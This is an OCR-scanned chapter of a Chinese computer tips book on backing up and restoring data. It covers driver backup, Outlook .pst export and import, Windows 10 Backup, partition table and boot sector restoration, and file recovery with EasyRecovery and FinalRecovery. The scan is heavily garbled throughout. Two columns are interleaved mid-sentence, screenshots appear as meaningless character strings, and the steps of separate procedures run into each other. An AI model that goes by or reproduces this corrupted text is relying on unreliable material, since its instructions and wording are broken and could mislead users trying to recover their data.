后 ， 安 装 相应 的 驱动 程序 。 因 此 ， 在 备份 ”的 攻击 导致 电子 邮件 的 丢失 ， 对 电子 邮件 
驱动 程序 时 ， 最 好 将 所 有 的 驱动 程序 都 进 ”进行 备份 和 还 原 就 非常 重要 了 。 管 理 电子 
行 备份 ， 具 体 的 操作 步骤 如 下 。 邮件 的 工具 很 多 ， 这 里 以 常见 的 Outlook 为 
[EGG6 国 在 “驱动 备份 还 原 ” 工 作 界面 中 单 击 ， 例 介绍 其 备份 和 还 原 电子 邮件 的 方法 。 


1. 通过 安装 目录 备份 电子 邮件 


国 pore Outlook 与 其 他 管理 电子 邮件 工具 一 
样 ， 通 常情 况 下 安装 在 系统 默认 的 目录 CA 


Documents and Settimgs\Administrator\Local 


Settings\Application Data\Microsoft\Outlook 
| 下 ， 这 样 ， 就 可 以 通过 复制 此 目录 下 的 文 
-Cs 件 到 其 他 磁盘 中 来 完成 备份 操作 ， 如 果 要 
”Ls 还 原 只 用 重新 复制 回来 即 可 。 


[Btep 国 开始 备份 所 有 硬件 的 驱动 程序 ， 并 在 2. 通过 向 导 备份 电子 邮件 

后 面 显示 备份 的 进度 ， 如 下 图 所 示 。 还 可 以 运用 Outlook 的 “导入 /导出 向 
ea | 导 ” 来 实现 备份 还 原 操作 ,具体 的 操作 步 又 

如 下 。 

启动 Outlook 2016 主 程序 ， 选 择 “ 文 

件 ” 选 项 卡 ， 进 入 到 “文件 ”界面 ， 在 该 

界面 中 选择 “打开 和 导出 ”选项 区 域内 的 “时 

入 /导出 ”选项 ， 然 后 在 “打开 ”设置 区 域 

中 选择 “导入 /导出 ”选项 ， 如 下 图 所 示 。 


6 备份 完成 后 ， 会 在 硬件 驱动 程序 的 右 和 
打开 日 历 
侧 显示 “备份 完成 ”的 信息 提示 ,如 下 图 所 示 。 届 | Be 
—— -> 2 
安生 
3 se 


Ee 图 打开 “导入 和 导出 向 导 ” 对 话 框 ， 在 
“请 选择 要 执行 的 操作 ”列表 杠 中 选择 “ 导 
出 到 文件 ”选项 ， 如 下 图 所 示 。 
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NS 


[Ee] | 喜 


[step 图 单 击 “下 一 步 ” 按 钮 ， 打开 “导出 到 
文件 ”对 话 框 ， 在 “创建 文件 的 类 型 ” 列 
表 框 中 选择 “Outlook 数据 文件 (pst)” 选 项 ， 
如 下 图 所 示 。 


3 和 


EO): 


< 上 -6) 和 清 


Es 国 单 直 “下 一 步 ”按钮 ， 打 开 “ 导 出 
Outlook 数据 文件 ”对 话 框 ， 在 “ 选 定 导 出 
的 文件 夹 ”列表 框 中 选择 要 导出 的 文件 夫 ， 
如 下 图 所 示 。 


导出 Outlock 数据 六 件 X 


回 包 括 子 文 作 夫 (9] 和 SD.. 


< 上 za [rm | | 9 
step 园 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 寻 出 
Outlook 数据 文件 ”对 话 框 ， 在 “选项 ” 选 
项 组 中 选中 “用 导出 的 项 目 替换 重要 的 项 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 = 


目 ” 单 选 按 钮 ， 在 “将 导出 文件 另存 为 ” 
的 文本 框 中 输入 文件 保存 的 路 径 ， 如 下 图 


所 示 。 


导出 Cutock 至 经 文 伯 


< 上 - 步 B Bs 


[EGG 国 单 击 “ 完 成 ”按钮 打开“ 创建 
Outlook 数据 文件 ”对 话 框 ， 在 “密码 ”和 
“验证 密码 ”文本 框 中 输入 相同 的 文件 密码 ， 


如 下 图 所 示 。 


创建 Outlook 数据 文件 x 


单 击 “确定 ”按钮 ， 打 开 “Outlook 
数据 文件 密码 ”对 话 框 ， 在 “密码 ”文本 
框 中 输入 文件 的 密码 。 单 击 “ 确 定 ” 按 钮 ， 

即 可 完成 备份 电子 邮件 的 操作 ， 如 下 图 


所 示 。 
Outlook 数据 文件 宅 码 x 


请 给 入 backup.pst 的 密码 。 


二 呈 (P): ooo0ee 
将 密码 保存 在 密码 表 宁 (S) 


Jw 


绝招 5: 备份 磁盘 文件 数据 


随 着 计算 机 和 互联 网 的 普及 ， 越 来 越 累 


多 的 人 喜欢 用 计算 机 来 存储 文件 ， 然 而 由 
于 木马 和 病毒 入 侵 或 个 人 的 误 操作 ， 可 能 
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会 使 文件 丢失 。 为 此 ， 用 户 有 必要 对 文件 
进行 备份 ， 当 原文 件 丢 失 后 ， 还 可 以 通过 
备份 文件 来 恢复 。 

Windows 10 操作 系统 为 用 户 提 供 了 备 
份 文件 的 功能 ， 用 户 只 需 通过 简单 的 设置 ， 
就 可 以 确保 文件 不 会 丢失 。 备 份 文件 的 具 
体操 作 步 又 如 下 。 

[Bep 国 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 ， 弹 出 “ 控 
制 面板 ”窗口 ， 如 下 图 所 示 。 


[step 国 在 “控制 面板 ”窗口 中 单 击 “ 查 看 方 
式 ” 右 侧 的 下 拉 按钮 ， 在 打开 的 下 拉 列 表 
中 选择 “小 图 标 ” 选项 ， 单 击 “备份 和 还 原 ” 
链接 ， 如 下 图 所 示 。 


[step 图 弹出 “备份 或 还 原 ” 窗 口 ， 在 “备份 ” 
下 显示 “尚未 设置 Windows 备份 ”信息 ， 
表示 还 没有 创建 备份 ， 如 下 图 所 示 。 


ey - oO x 


入 全 还 风 作 8 文件 


ne 
SE Wd se 

二 
ac 
ss=aa=a5=ceasnn 
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[step 园 单 去 “设置 备份 ”按钮 ， 弹 出 “设置 
备份 ”对 话 框 , 系统 开始 启动 Windows 备 份 ， 
并 显示 启动 的 进度 ， 如 下 图 所 示 。 
Ye Es x 
光 正在 启动 Windows 备份 
Windows 备份 正在 启动 , 请 稍 候 


[step 图 启动 完毕 后 ， 将 弹出 “选择 要 保存 备 
份 的 位 置 ” 对 话 框 ， 在 “保存 备份 的 位 置 ” 
列表 框 中 选择 要 保存 备份 的 位 置 。 如 果 想 
保存 在 网 络 上 ， 可 以 单 击 “ 保 存在 网 络 上 ” 
按钮 。 这 里 将 保存 备份 的 位 置 设 置 为 本 地 
磁盘 (G)， 因 此 选择 “本 地 磁盘 (G)” 选 
项 ， 单 击 “ 下 一 步 ”按钮 ， 如 下 图 所 示 。 


sees 


[ ENE. 


[m= 


弹出 “你 希望 备份 哪些 内 容 ? ”对 话 
框 , 选中 让 我 选择 ” 单 选 按钮 如果 选中 让 
Windows 选择 〈 推 荐 )” 单 选 按钮 ， 则 系统 
会 备份 库 、 桌 面 上 以 及 在 计算 机 上 拥有 用 
户 账 户 的 所 有 人 员 的 默认 Windows 文件 夹 
中 保存 的 数据 文件 ， 单 击 “下 一 步 ” 按 钮 ， 
如 下 图 所 示 。 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 


[step 国 在 打开 的 对 话 框 中 选择 需要 备份 的 文 


件 ， 如 选中 “Excel 办 公 ” 文 件 夹 左 侧 的 复 
选 框 ， 单 击 “ 下 一 步 ”按钮 ， 如 下 图 所 示 。 
| x ip 
-0 a 
es [9] | 3 
[EGG8 国 单 去 “保存 设置 并 运行 备份 ”按钮 
[m= 


弹出 “备份 和 还 原 ” 窗 口 ， 系 统 开始 自动 
[step 园 弹出 “查看 备份 设置 ”对 话 框 , 在 “ 计 ”备份 文件 并 显示 备份 的 进度 ， 如 下 图 所 示 。 
划 ” 右 侧 显 示 自 动 备份 的 时 间 ， 单 击 “更 Wisss 


oO x 
y 和 和 艺 ” ji 本 - ， 委 BE “oe 
改 计划 ”按钮 ， 如 下 图 所 示 。 “ oO. 
De 备份 或 还 所 你 的 文件 
9H 
Pe oa 区 E hd DE) 
PR as 
ne 
on nag 
ae ts PE) 
ne 00 56 司 用 .5001 66 
Ce 全 全 大 小 没有 有关 科 
Os 
下 一 浆 生 从: 下 Eee 
+ 天 
bm AS 迄 定 的 文件 冯 中 的 文件 
ee, on Ezz ES Ha 1900 
5 和 
备份 完成 后 ， 将 弹出 “Windows 备份 
™ 


已 成 功 完成 ”窗口 。 单 击 “ 关 闭 ” 按 钮 即 
可 完成 备份 操作 ， 如 下 图 所 示 。 


器 Windoms 生 全 -100% 完成 


[step 国 弹出 “你 希望 多 久 备份 一 次 ”对 话 框 ， 
单 击 “ 哪 一 天 ” 右 侧 的 下 拉 按 钮 ， 在 打开 
的 下 拉 列 表 中 选择 “星期 二 ”选项 ， 如 下 
图 所 示 。 


Windows 备份 已 或 功 完成 


HF Windcua Tees 


11.2 ”恢复 各 类 磁盘 数据 


A 在 11.1 节 介 绍 了 各 类 数据 的 备份 ， 这 
Se 图 单 去 “确定 ”按钮 ， 返 回 到 “查看 备 ” 样 一 旦 发 现 自己 的 磁盘 数据 丢失 ， 就 可 以 
份 设置 ”对 话 框 ， 如 下 图 所 示 。 进行 恢复 操作 了 。 
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到 绝招 6: 恢复 分 区 表 数 据 
当 计 算 机 遭 到 病毒 破坏 、 加 密 引 导 区 


”或 误 分 区 等 操作 导致 硬盘 分 区 丢失 时 ， 就 
需要 还 原 分 区 表 。 这 里 以 DiskGenius V4.9 
软件 为 例 ， 来 讲述 如 何 还 原 分 区 表 ， 具 体 
的 操作 步骤 如 下 。 

[step 图 打开 软件 DiskGenius V4.9， 在 其 主 界 
面 中 选择 “硬盘 ”一 “还 原 分 区 表 ” 菜 单 
选项 或 按 F10 键 ， 如 下 图 所 示 。 


Esep 国 打开 “选择 分 区 表 备份 文件 ”对 话 框 ， 
在 其 中 选择 硬盘 分 区 表 的 备份 文件 ， 如 下 
图 所 示 。 


| 国 Ie 分 区 各 从 六 从 x 
个 轩 ，He 贡 去 机 > 
ja ”有 天 
BL 从 
画 MA 
四 
EE 
是 全 
小 可 
国 sa 
Sin Windows0 tc 
= + DY 
= 
四 
= Si 


和 


Eee 国 单 击 “打开 ”按钮 即 可 打开 
DiskGenius 信息 提示 框 ， 提 示 用 户 是 否 从 这 
个 分 区 表 备 份 文件 还 原 分 区 表 , 如 下 图 所 示 。 


DiskGenius 


[7] 是 否 从 这 个 分 区 表 备 份 文件 还 原 分 区 囊 ? 还 原 后 检 立 即 保存 到 磁盘 并 生 
效 


Ce 
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Step 加 单 去 “是 ”按钮 ， 即 可 还 原 分 区 表 ， 
且 还 原 后 将 立即 保存 到 磁盘 并 生效 。 


绝招 7: 恢复 引导 区 数据 


当 引 导 区 染 上 了 病毒 或 被 损坏 ， 使 用 
《瑞星 全 功能 安全 软件 》 可 以 将 引导 区 恢复 ， 
具体 的 操作 步骤 如 下 。 

[Step 加 打开 《瑞星 全 功能 安全 软件 》 的 “ 瑞 
星 工 具 ” 窗 口 ， 在 其 中 选择 “引导 区 还 原 ” 
选项 ， 如 下 图 所 示 。 


[step 图 打开 “引导 区 还 原 ” 窗 口 ， 在 其 中 选 
中 “恢复 引导 区 ” 单 选 按钮 ， 如 下 图 所 示 。 


使 用 安全 工具 本 以 者 助人 从 或 者 人 四 引导 区 数据 
O 〇 aalSE 
lS 区 
取消 


[step 图 单 击 “ 下 一 步 ” 按 钮 打开 “引导 区 
还 原 ” 窗 口 ， 在 “选择 目录 ”文本 框 中 输入 
引导 区 备份 文件 保存 的 路 径 ， 如 下 图 所 示 。 


葛 引导 区 还 原 


一 x 


准备 恢复 引导 区 .… 
选择 目录 
[C:\Program FesRisangRisbootdat | 六 
确定 取消 


Estee 加 或 单 去 “浏览 ”按钮 ， 打 开 “ 浏 览 文 
件 夹 ”对 话 框 ， 在 “选择 目录 ”列表 框 中 选 
择 引 导 区 备份 文件 保存 的 路 径 , 如 下 图 所 示 。 


》 沁 Windows10 (c 
》 二 本 地政 盘 (D 
》 二 本 开盘 (E) 
) 一 本 地 融 笃 (P | 
》 号 本 地 磁盘 (H;) "| 


Eee 图 单 去 “确定 ”按钮 ， 返 回 到 “引导 区 
还 原 ” 窗 口 ， 如 下 图 所 示 。 


好 引 S 区 还 原 四 x 
准备 恢复 引导 区 .… 
选择 目录 
E ] 


[Etep 国 单 去 “确定 ”按钮 ， 即 可 开始 恢复 引 
导 区 ,恢复 完毕 后 , 打开 “提示 信息 ”对 话 框 ， 
提示 用 户 恢复 成 功 ， 如 下 图 所 示 。 

据 信 XX 


@ “sm: 


加 绝招 8: 恢复 驱动 程序 数据 


前 面 介绍 了 使 用 《驱动 精灵 》 备 份 驱 
动 程序 的 方法 ， 下 面 介绍 使 用 《驱动 精灵 》 
恢复 驱动 程序 的 方法 ， 具 体 的 操作 步骤 
如 下 。 

[step 图 在 “驱动 精灵 ”的 主 窗口 中 单 击 “ 百 
宝箱 ”按钮 ， 如 下 图 所 示 。 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 = 


SR ees 二 Ws 


pr 
EE 


[step 图 进入 “百宝箱 ”操作 界面 ， 在 其 中 单 
击 “ 了 驱动 还 原 ” 图 标 ， 如 下 图 所 示 。 


图 

上 日 外 加 回避 加 
四 加 达旦 

es 


进入 “驱动 备份 还 原 ” 窗 口 ， 打开“ 驱 
动 还 原 ”操作 界面 ， 如 下 图 所 示 。 


二 ce em 
[step 园 在 “驱动 备份 ”列表 中 选择 需要 还 原 
的 驱动 程序 ， 如 下 图 所 示 。 
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EEsg 国 单 击 “ 一 键 还 原 ” 按 钮 ， 驱 动 程 序 开 ;绝招 9: 恢复 丢失 的 电子 邮件 
始 还 原 ， 这 个 过 程 相当 于 安装 驱动 程序 的 针对 第 一 种 方法 的 备用 ， 用 户 只 需 将 峰 
二 相国 所 下 5 复制 到 别 的 磁盘 中 的 文件 ， 再 次 复制 到 原 ” 
A 者 ”来 的 目录 位 置 即 可 。 

使 用 向 导 还原 电 子 邮 件 的 操作 步骤 
如 下 。 
[Sep 国 启动 Outlook 2016 主 程序 ， 选 择 “ 文 
件 ” 选 项 卡 ， 进 入 到 “文件 ”界面 ， 在 该 
界面 中 选择 “打开 和 导出 ”选项 区 域内 的 “ 导 
入 /导出 ”选项 ， 如 下 图 所 示 。 


3 是 们 = i 
[es 图 还 原 进度 如 下 图 所 示 。 a 


打开 Outlook 数据 文件 


打开 Outlook 光 近 安仁 (pn 


导入 /导出 
号 人 醒 8 出 六 和 和 


其 他 用 户 的 文件 夹 
打开 其他 用 户 史 训 文件， 


[step 图 打开 “导入 和 导出 向 导 ” 对 话 框 ， 在 

ER es “请 选择 要 执行 的 操作 ”列表 框 中 选择 “从 
[step 国 还 原 完成 后 ， 会 在 “驱动 备份 还 原 ” ， 另 一 个 程序 或 文件 导入 ”选项 , 如 下 图 所 示 。 
工作 界面 显示 “还 原 完成 ， 重 启 后 生效 ” 


国 ) eee Mon pointon no 


的 信息 提示 , 如 下 图 所 示 , 这 时 可 以 单 去 < 立 | 
即 重启 ”按钮 ， 重 新 启动 计算 机 ， 使 还 原 
的 驱动 程序 生效 。 

pp D> 

最 还 原 完成 ， 重 启 后 生效 
et) ba 说 明 
ER ) A ,例如 Outlook 数据 文件 (,PST) 和 文本 文 
| | i | 


[step 图 单 击 “ 下 一 步 ” 按 钮 , 打开 “导入 文件 ” 
对 话 框 ， 在 “从 下 面 位 置 选择 要 导入 的 文 
件 类 型 ”列表 框 中 选择 “Outlook 数据 文件 
(pst)” 选 项， 如 下 图 所 示 。 
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号 和 文件 


二 而 


第 11 章 


导入 Outiock 到 文件 x 


从 下 而 位 于 入 过 要 导入 和 文人 去 (Ej}: 
， 层 Outlock 村 B 立 件 


人 ai 了 文件 关 G) 

口号 和 大 到 当前 文件 友 () 

转 导 入 古村 但 同 立 件 二 (ph- 
zhangxiaoxiao123123@outlookcom 


Em [本 J][ 殉 


[step 园 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 导 入 
Outlook 数据 文件 ”对 话 框 ， 在 “选项 ”区 
选中 “用 导入 的 项 目 替换 重复 的 项 目 ” 单 
选 按钮 ， 在 “导入 文件 ”的 文本 框 中 输入 
导入 文件 的 路 径 ， 或 单 击 “ 浏 览 ” 按 钮 ， 
打开 “打开 Outlook 数据 文件 ”对 话 框 ， 在 
其 中 选择 导入 的 数据 文件 ， 如 下 图 所 示 。 


导入 Outlook 数据 文件 x 


| 导入 文件 上 


@@ 用 S 入 的 项 目 管 重复 的 项 目 (6) 
口 允许 人 娃 重 复 项 目 (A) 
口 不 导入 重复 项 目 (D) 


[En] | 击 


[ep 图 单 二 “下 一 步 ” 按 钮 ， 打 开 “Outlook 
数据 文件 密码 ”对 话 框 ， 在 “密码 ”文本 
框 中 输入 数据 文件 的 密码 ， 如 下 图 所 示 。 


Outlook 数据 文件 宅 码 x 


请 给 入 backup.pst 的 密码 . 
密码 (P): 
口 将 密码 保存 在 密码 表 中 (S) 


Cw ||| ww 
Step 图 单 击 “ 确 定 ” 按 钮 打开“ 导入 


Outlook 数据 文件 ”对 话 框 ， 选 择 需要 导入 
的 邮件 , 单 击 “完成 ”按钮 即 可 ,如 下 图 所 示 。 


磁盘 数据 的 备份 与 恢复 技巧 = 


绝招 10: 恢复 丢失 的 磁盘 文件 数据 


当 对 磁盘 文件 数据 进行 了 备份， 训 可 Si 


以 通过 “备份 和 还 原 ” 窗 口 对 数据 进行 恢复 ， 
具体 的 操作 步骤 如 下 。 

[sep 国 打开 “备份 和 还 原 ” 对 话 框 ， 在 “ 备 
份 ” 类 别 中 可 以 看 到 备份 文件 的 详细 信息 ， 


如 下 图 所 示 。 
[一 一 四 
+ x 
- 
RSS 备份 或 还 腿 人 03 文件 
本 和 
ee 一 
汪汪 
> 
Le 
| 
四 
os mpm RR 
2 一 
2 


[step 图 单 去 “还 原 我 的 文件 ”按钮 ， 弹 出“ 浏 
览 或 搜索 要 还 原 的 文件 和 文件 夹 的 备份 
对 话 框 ， 如 下 图 所 示 。 


” 
tp Es 
浏 或 搜索 要 还 奈 的 文件 和 文件 实 的 备份 
pe Rs). 
. mm mig 
ET 
ele) 
Ey 
FE | 
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[step 图 单 击 “选择 其 他 日 期 ”链接 ,弹出 “还 
原文 件 ” 对 话 框 ， 在 “显示 如 下 来 源 的 备 
份 ” 下 拉 列 表 中 选择 “上 周 ” 选 项 ， 然 后 
选择 “日 期 和 时 间 ” 组 合 框 中 的 “2016/1/29 
12.54.49” 选 项 ， 即 可 将 所 有 的 文件 都 还 原 
到 选中 日 期 和 时 间 的 版 本 ， 单 击 “ 确 定 ” 
按钮 ， 如 下 图 所 示 。 


则 | 还 原文 件 x 


所 有 文件 都 将 还 原 到 进行 备份 时 的 版 本 . 
显示 如 下 来 源 的 备份 : | 上 周 所 


日 期 和 时 间 | 


2016/1/29 12:54:24 
2016/1/29 12:52:57 


[ep 图 返回 到 “浏览 或 搜索 要 还 原 的 文件 和 
文件 夹 的 备份 ”对 话 框 ， 如 下 图 所 示 。 


x 
加 还 了 文 从 
齐 暗 或 搜索 要 还 原 的 文件 和 文件 夹 的 备份 
光 所 有 位 相 还 认 因 天 条 二 二 
a 
到 aE RS}. 
ET 全 二 信人 E70 
Na) 
Go 
Vs 
= 


[step 较 如果 用 户 想 要 查看 备份 的 内 容 ， 可 以 
单 击 “ 浏 览 文件 ”或 “浏览 文件 夹 ”按钮 ， 
在 打开 的 对 话 框 中 查看 备份 的 内 容 。 这 里 
单 击 “ 浏 览 文件 ”按钮 ， 弹 出 “浏览 文件 
的 备份 ”对 话 框 ， 在 其 中 选择 备份 文件 ， 
如 下 图 所 示 。 
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em eroraMornvesaer nr TAREE -| WE 


Ce | 
[ep 图 单 去 “添加 文件 ”按钮 ， 返 回 到 “ 浏 
览 或 搜索 要 还 原 的 文件 和 文件 夹 的 备份 ” 
对 话 框 ， 可 以 看 到 选择 的 备份 文件 已 经 添 
加 到 对 话 框 的 列表 框 中 ， 如 下 图 所 示 。 


名 sxs 
济 攻 号 香 索 要 还 原 的 文件 和 文件 来 的 备份 
2 
ese=5 
站 现下- 
E20 
No) 
pn 
SMe 
SN | | RW 


[step 国 单 去 “下 一 步 ” 按 钮 ， 弹 出 “你 想 在 
何 处 还 原文 件 ” 对 话 框 ， 在 其 中 选中 “在 
以 下 位 置 ” 单 选 按钮 ， 如 下 图 所 示 。 


x 
¢ sxe 
你 起 在 何 处 还 原文 件 ? 
Om 
ET 
3 
[ma 
a 
a smedFieeNete ee 
EB CNewocation\Note tot 
Es E23 


step 图 单 击 “ 浏 览 ” 按 钮 , 弹出 “浏览 文件 夹 ” 
对 话 框 , 选择 文件 还 原 的 位 置 , 如 下 图 所 示 。 


[step 图 单 去 “确定 ”按钮 ， 返 回 到 “你 想 在 
何 处 还 原文 件 ” 对话 框 。 单 击 “ 还 原 ” 按 钮 ， 
弹出 “正在 还 原文 件 ” 对 话 框 ， 系 统 开始 
自动 还 原 备 份 的 文件 ， 如 下 图 所 示 。 


二 therm 
人 在 何 处 还原 文件 ? 
edt 
EM Fasl): 
人 [Ea 
es 
A 
ee 
ss 
CCE] 因 


当 出 现 “ 已 还 原文 件 ” 对 话 框 时 ， 单 
击 “ 完 成 ”按钮 ， 即 可 完成 还 原 操作 ， 如 
下 图 所 示 。 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 


11.3 ”使 用 数据 恢复 工具 恢复 
丢失 的 数据 


如 果 对 磁盘 数据 没有 进行 备份 操作 ， 
结果 发 现 磁盘 数据 丢失 了 ， 这 时 就 需要 借 
助 其 他 方法 或 使 用 数据 恢复 软件 进行 丢失 
数据 的 恢复 。 


绝招 11: 使 用 EasyRecovery 恢 复数 据 


EasyRecovery 是 世界 著名 数据 恢复 公 
司 Ontrack 的 技术 杰作 ， 利 用 EasyRecovery 
进行 数据 恢复 ， 就 是 通过 EasyRecovery 将 
分 布 在 硬盘 上 的 不 同位 置 的 文件 碎 块 找 回 
来 ， 并 根据 统计 信息 将 这 些 文件 碎 块 进行 
重 整 ， 然 后 EasyRecovery 会 在 内 存 中 建立 
一 个 虚拟 的 文件 夹 系统 ， 并 列 出 所 有 的 目 
录 和 文件 。 

使 用 EasyRecovery 恢复 数据 的 具体 操 
作 步 又 如 下 。 
双击 桌面 上 的 EasyRecovery 图 标 ， 进 


入 EasyRecovery 主 窗口 。 
区 ESYR， e ery- 图 加 
壹 件 更 新 La 快 汪 启动 


Ontrack SS 
Ea 


Professional 


[step 图 单 击 Easy Recovery 主 窗口 上 的 “ 数 
据 恢复 ”选项 ,， 即 可 进入 软件 的 “数据 恢复 ” 
窗口 ， 在 其 中 显示 了 “高 级 恢复 ”“ 删 除 恢 
复 ”“ 格 式 化 恢复 ”“ 原 始 恢复 ”等 选项 。 
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里 急 引导 盘 
国 warssss 


[step 图 选择 F 盘 上 的 “图 片 rar” 文 件 ， 将 
其 进行 彻底 删除 ， 单 击 “ 数 据 恢复 ”选项 
中 的 “删除 恢复 ”按钮 ， 即 可 开始 扫描 系统 ， 
如 下 图 所 示 。 


正在 扫描 系统 ... 


[ep 加 在 扫描 结束 后 ， 将 会 弹出 “目的 地 警 
pe 警告 提示 ， 建 议 用 户 将 文件 复制 到 不 
与 恢复 来 源 相 同 的 一 个 安全 位 置 ， 如 下 图 
所 示 。 


ee 
和 


厂 不 再 显示 访 消 和 攻 村 


[step 图 单 去 “确定 ”按钮 ， 将 会 自动 弹出 如 
下 图 所 示 的 对 话 框 ， 提 示 用 户 选择 一 个 要 
恢复 删除 文件 的 分 区 , 这 里 选择 FF 盘 。 在 “ 文 
件 过 滤器 ”中 进行 相应 的 选择 ， 如 果 误 删 
除 的 是 图 片 ， 则 在 文件 过 滤器 中 选择 “图 
像 文档 ”选项 。 但 若 用 户 要 恢复 的 文件 是 
不 同类 型 的 ， 可 直接 选择 “所 有 文件 ”， 再 
选中 “完整 扫描 ” 复 选 框 ， 如 下 图 所 示 。 


人 

和 
站 人 地 蛙 ， 人 用 家 不 代用“ 沁 了 字 >， 以 全 人才 一 
far 


半音 
内 芝 下 "出 人 到 ~ 工具 上 和信 人 二 六 ， 基 网 

于 几 吉 具 记 恒久 让 二 二” 于 拉 和 从 区 
7 ES 
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[step 图 单 击 “ 下 一 步 ” 按 钮 软件 开始 扫描 
选 定 的 磁盘 , 并 显示 扫描 进度 , 如 已 用 时 间 、 
剩余 时 间 、 找 到 目录 、 找 到 文件 等 ， 如 下 
图 所 示 。 


= 正在 处 理 区 块 2450 / 2623 
3 秒 
间 : 0 秒 
2461 


7316 


上 次 文件 : x86_microsoft-windows-setup-dependencies_31bf3956 


|。 芭 沿 


[sep 轩 扫描 完毕 后 ， 将 扫描 到 的 相关 文件 及 
资料 在 对 话 框 左 侧 以 树 状 目录 列 出 来 ， 右 
侧 则 显示 具体 删除 的 文件 信息 。 在 其 中 选 
择 要 恢复 的 文档 或 文件 夹 ， 这 里 选择 “图 
片 rar” 文 件 ， 如 下 图 所 示 。 

EasyRe ~ | 


refeaainal 


过 中 你 机 人 路 的 文件 ,和 至 “下 一 步 ”站 呈 负 “ 昌 的 地 进 至 ” 开 你 ， 迁 泽 “ 后 衣 ” 逻 四 昌 “ 分 区 交 


ED En 
EET 10119/2016 。 DX 


jon 
a 口 自 LOsTRLE 
FET 


5 下 
TR RV 


厂 项 放 过 站 尊 中。 过 二 小 二天 (0 | 二 (日 


SEG IT ,HANLME 


二 
ER | 0 


二 一 一 


二 一 一 


[sep 图 单 直 “ 下 一 步 ” 按 钮 ， 可 在 弹出 的 对 
话 框 中 设置 恢复 数据 的 保存 路 径 ， 如 下 图 
所 示 。 


| 

总 大 由 < 本 四 

ED 

[Ems a 
| 

E23 


step 图 单 击 “浏览 ”按钮 打开“ 浏览 文件 
夹 ” 对 话 框 ， 在 其 中 选择 恢复 数据 保存 的 
路 径 ， 如 下 图 所 示 。 


浏览 文件 夫 x 


step 柄 单 去 “确定 ”按钮 ， 返 回 到 设置 恢复 
数据 保存 的 路 径 对 话 框 ， 如 下 图 所 示 。 


a 


提取 一 个 将 复制 归 据 的 目的 地 ， 寺 择 “下 一 步 ”开始 色 制 文件， 园 泽 “后退 ” 拓 回 到 “标记 文件 株 生 ” 屏 
TT 
文件 1 
总 失 大 小 :4 引用 
恢 夏 日 的 贡 选 顺 
-Em ia 


售 计 空间 3g: 9l.6e 码 机 要 


染 霹 
厂 生 成 做 昌 要 
| 


[step 国 单 击 “ 下 一 步 ” 按 钮 ， 软 件 自 动 将 文 
件 恢复 到 指定 的 位 置 ， 如 下 图 所 示 。 


正在 复制 数据 . . - 
5 当前 文件 : 图 片 .rar 
已 用 时 间 : 2 秒 
剩余 时 间 : 
已 恢复 1 / 1 个 文件 
已 恢复 2.94 NB /4.81WB 


取消 


lstep 贺 在 完成 文件 恢复 操作 之 后 ，Easy 
Recovery 将 会 弹出 一 个 恢复 完成 的 提示 信 
息 窗口 ， 在 其 中 显示 了 数据 恢复 的 详细 内 
容 ， 包 括 源 分 区 、 文 件 大 小 、 已 存储 数据 
的 位 置 等 内 容 ， 如 下 图 所 示 。 
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单 南 “ 完 成 ”按钮 打开“ 保存 恢复 ” 
对 话 框 。 单 击 “ 否 ”按钮 ， 即 可 完成 恢复 ， 
如 果 还 有 其 他 的 文件 要 恢复 ， 则 可 以 选择 
“是 ”按钮 ， 如 下 图 所 示 。 


保存 恢复 
您 是 否 要 保存 恢复 状态 以 便 在 今后 继续 9 


是 | 否 


绝招 12: 使 用 FinalRecovery 恢 复数 据 


FinalRecovery 是 一 个 功能 强大 而 且 非 B 
常 容易 使 用 的 数据 恢复 工具 ， 它 可 以 帮助 
用 户 快速 找 回 丢 失 的 文件 或 者 文件 夹 。 

这 里 以 恢复 丢失 的 本 地 磁盘 F 盘 中 的 
“ 美 图 rar” 文 件 为 例 , 具体 的 操作 步骤 如 下 。 
[sep 回 在 FinalRecovery 程序 主 窗口 中 选中 
右 侧 窗 格 中 丢失 文件 所 在 的 驱动 磁盘 ， 这 
里 选择 本 地 磁盘 F， 如 下 图 所 示 。 


本 Frahaconan30 IDEMol - oO x 
Fe v 


My Cor Curen 6 envies 
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fsep 贺 单 击 工具 栏 中 的 “Scan (扫描 )” 按 钮 ， 
打开 “Select Scan Mode (选择 扫描 模式 )” 
对 话 框 ， 系 统 为 用 户 提供 了 三 种 扫描 模式 ， 
包括 Standard Scan (标准 扫描 ) 、Advanced 
Scan (高 级 扫描 ) 以 及 Scan for Partitions ( 扫 
描 整 个 分 区 ) ， 如 下 图 所 示 。 


Select Scan Mode 3 


Standard Scan: 
Fast and powerful scan mathod. Most deleted fles 
and folders can be found by usirg this method. 


、 Advanced Scarr 
二 
So 
Scan for par 


Scan diive to ct paritiona and then 
“Standard Scan’ and “Advanced Scan’ can be applied 
to fourd partiions, 


[se 图 单 击 “Standard Scan” 按 钮 ， 即 可 开 
始 对 下 盘 执 行 标准 扫描 ， 扫 描 完 成 后 ， 其 
扫描 结果 显示 在 窗口 右 侧 的 窗 格 中 ， 如 下 
图 所 示 。 


文件 ， 


在 其 中 选择 已 经 删除 的 “ 美 图 .rar” 
单 击 Recover 按钮 ， 打 开 “ 打 开 ” 对 


话 框 ， 在 其 中 选择 恢复 文件 的 保存 位 置 ， 
这 里 选择 本 地 磁盘 D， 如 下 图 所 示 。 
三 H 开 
文件 夫 ，[ 局 本 地 和 GD) “| 8 
寻访 售 改 日 骨 
D300ownloads 2016-07.01 1029 
和 so0windowso 2016-07-08 1246 
区 由 360 宇 全 济 鉴 苦 下 过 2017-01-03 1308 
一 ee 2016-07-05 1238 
2016-1005 1122 
EE 2016-09-18 12:06 
2016-09-19 1050 
2017-01-02 1346 
国 2016-10-05 1791 
雍 时 及 。。 国 oficczo16IEAHE 活 (委托 ) 2016-10-05 1725 
国 phpbook 2016-07-05 18:10 
st ao ns nner 网 
嘟 : 3 
网 和 
文 夫 区 请 
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[sp 图 单 去 “确定 ”按钮 ， 即 可 开始 恢复 “ 美 
图 rar” 文 件 ， 并 显示 恢复 文件 的 个 数 ， 如 
下 图 所 示 。 


Recovery Summary x 


Processed Files: 1 
Recovered Files: 1 


Failed Files: 0 


Close 


